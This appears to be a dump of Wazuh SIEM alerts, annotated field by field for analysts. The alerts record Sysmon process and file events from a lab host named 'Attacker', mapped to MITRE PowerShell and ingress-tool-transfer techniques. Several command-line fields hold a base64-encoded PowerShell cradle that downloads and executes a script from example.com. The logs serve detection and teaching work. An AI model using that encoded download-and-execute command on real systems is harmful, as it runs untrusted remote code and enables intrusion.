rule.firedtimes: 94 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534375.1867923 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:33.2686532Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285352 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:33.220
ProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00}
ProcessId: 6888
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_em23qzpd.dwf.ps1
CreationUtcTime: 2025-04-24 22:39:33.220
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:33.220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda3-680a-a80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_em23qzpd.dwf.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:33.220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 91 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534379.1870688 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:36.5833716Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285381 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:34.873
ProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00}
ProcessId: 9052
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00}
ParentProcessId: 6888
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:34.873 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda6-680a-ab0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 6888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 95 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534379.1878751 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:36.8501371Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285382 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:36.811
ProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00}
ProcessId: 9052
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bh44e1ed.2pr.ps1
CreationUtcTime: 2025-04-24 22:39:36.811
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:36.811 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda6-680a-ab0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bh44e1ed.2pr.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:36.811 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 92 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534385.1881516 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:43.3397900Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285441 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:40.470
ProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00}
ProcessId: 4284
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00}
ParentProcessId: 9052
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:40.470 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdac-680a-ad0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 96 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534385.1889579 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:43.5281312Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285444 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:43.503
ProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00}
ProcessId: 4284
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dufuzwko.3br.ps1
CreationUtcTime: 2025-04-24 22:39:43.500
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:43.503 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdac-680a-ad0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dufuzwko.3br.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:43.500 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
